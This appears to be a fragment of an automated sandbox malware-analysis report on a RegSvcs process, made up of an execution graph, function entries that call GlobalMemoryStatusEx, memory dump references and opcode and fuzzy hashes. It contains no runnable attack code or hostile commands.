                                            • Instruction ID: dfaecda14b980966045f23af0839a4d4cf756550653541ec76ae75eee291ab80
                                            • Opcode Fuzzy Hash: 4b9a99825f341e80fe930cf84dd326303e20bd9fe771a9e520ea361dc141e9e6
                                            • Instruction Fuzzy Hash: 1851626690E7C28FF7174B6C68660E53FA0FF5365871E40F7C5CD8A4B3EA25180987A1

                                            Execution Graph

                                            Execution Coverage:15.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:53
                                            Total number of Limit Nodes:5
                                            execution_graph 12568 d518e0 12569 d518e4 12568->12569 12572 d51a61 12569->12572 12578 d51b78 12569->12578 12574 d51a9c 12572->12574 12573 d51b76 12573->12569 12574->12573 12584 d52018 12574->12584 12589 d51fbd 12574->12589 12594 d5200b 12574->12594 12580 d51b4f 12578->12580 12579 d51b76 12579->12569 12580->12579 12581 d51fbd GlobalMemoryStatusEx 12580->12581 12582 d52018 GlobalMemoryStatusEx 12580->12582 12583 d5200b GlobalMemoryStatusEx 12580->12583 12581->12580 12582->12580 12583->12580 12585 d52021 12584->12585 12599 d52c88 12585->12599 12605 d52d6b 12585->12605 12586 d5211e 12586->12586 12590 d51fc4 12589->12590 12592 d52c88 GlobalMemoryStatusEx 12590->12592 12593 d52d6b GlobalMemoryStatusEx 12590->12593 12591 d5211e 12591->12591 12592->12591 12593->12591 12595 d52021 12594->12595 12597 d52c88 GlobalMemoryStatusEx 12595->12597 12598 d52d6b GlobalMemoryStatusEx 12595->12598 12596 d5211e 12597->12596 12598->12596 12601 d52c8d 12599->12601 12600 d52d62 12600->12586 12601->12600 12610 d57df8 12601->12610 12614 d57de8 12601->12614 12602 d5305a 12602->12586 12606 d52d6e 12605->12606 12608 d57df8 GlobalMemoryStatusEx 12606->12608 12609 d57de8 GlobalMemoryStatusEx 12606->12609 12607 d5305a 12607->12586 12608->12607 12609->12607 12611 d57e1d 12610->12611 12618 d5808d 12611->12618 12612 d57e7f 12612->12602 12615 d57e1d 12614->12615 12617 d5808d GlobalMemoryStatusEx 12615->12617 12616 d57e7f 12616->12602 12617->12616 12622 d580c8 12618->12622 12627 d580b8 12618->12627 12619 d5809e 12619->12612 12623 d580d5 12622->12623 12624 d580fd 12622->12624 12623->12619 12632 d57a14 12624->12632 12628 d580d5 12627->12628 12629 d580fd 12627->12629 12628->12619 12630 d57a14 GlobalMemoryStatusEx 12629->12630 12631 d5811a 12630->12631 12631->12619 12633 d57a1b GlobalMemoryStatusEx 12632->12633 12635 d5811a 12633->12635 12635->12619

                                            Executed Functions

                                            Function 00D57A81 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1490 d57a81-d57a90 1491 d57a92-d57a93 1490->1491 1492 d57a1b 1490->1492 1493 d581a0-d581de 1491->1493 1492->1493 1494 d581e6-d58214 GlobalMemoryStatusEx 1493->1494 1495 d58216-d5821c 1494->1495 1496 d5821d-d58245 1494->1496 1495->1496
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: c8007a63d656ba712b9443334354cc389ddcea2a690725bfdf118f2fd0993dea
                                            • Instruction ID: 646b48e7ff5ef22980c57ba27a4ccceb3b4828913798274170b869354f317b32
                                            • Opcode Fuzzy Hash: c8007a63d656ba712b9443334354cc389ddcea2a690725bfdf118f2fd0993dea
                                            • Instruction Fuzzy Hash: B92179B1C0065ADFDB10DF9AD444B9EFBF4AF48311F24822AD814B7240D778A905CFA5
                                            Function 00D57A14 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1499 d57a14-d58214 GlobalMemoryStatusEx 1503 d58216-d5821c 1499->1503 1504 d5821d-d58245 1499->1504 1503->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 4fb1d8b2e7b12c308063fd4be972ffa894278bd5ad0a587617ee5d26e6ea3ace
                                            • Instruction ID: 79041ad8b62c0059214002bf49d5c7cb6e3b5530266c82db41bb268444b6dfe4
                                            • Opcode Fuzzy Hash: 4fb1d8b2e7b12c308063fd4be972ffa894278bd5ad0a587617ee5d26e6ea3ace
                                            • Instruction Fuzzy Hash: E91114B1C00659DBDB10DF9AC445B9EFBF4EF48321F24812AE818B7240D778A945CFA5
                                            Function 00D5819C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 d5819c-d581de 1509 d581e6-d58214 GlobalMemoryStatusEx 1507->1509 1510 d58216-d5821c 1509->1510 1511 d5821d-d58245 1509->1511 1510->1511
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 257977cf14dba98ef7b9aed6bfd887691ece3639bac1d5dfe2745b966ec0fd73
                                            • Instruction ID: 4d757d4deb4ab8e24a62911ae852dbed2c8b8154d5396f047e5d01038cbd5ba5
                                            • Opcode Fuzzy Hash: 257977cf14dba98ef7b9aed6bfd887691ece3639bac1d5dfe2745b966ec0fd73
                                            • Instruction Fuzzy Hash: 901156B1C0065ADBCB10DF9AC445BDEFBF4AF08320F15812AD818B7241D778A905CFA5
                                            Function 00ABD400 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2951585596.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_abd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51aaeb35c3327fe0f6c6b39a0b8312f98e1f4e0265cf33d85c33ff1e9d29db92
                                            • Instruction ID: 7a4ff56b24f4e6080e13549be7995503fc1ca85614e338ad0857797b5f98ad0f
                                            • Opcode Fuzzy Hash: 51aaeb35c3327fe0f6c6b39a0b8312f98e1f4e0265cf33d85c33ff1e9d29db92
                                            • Instruction Fuzzy Hash: 2B210076604204DFDB14DF10D9C0B66BF69FB98324F20C5A9E8090A247D33AE856CAA2
                                            Function 00ABD3FB Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2951585596.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_abd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction ID: d76c34be603c7e60c209c9e90fa8abc8f1315ba3458b25e9a15ed686b1e18e71
                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction Fuzzy Hash: 8511BE76504284CFCB16CF10D9C4B56BF72FB94324F24C6A9D8490B657D33AE85ACBA2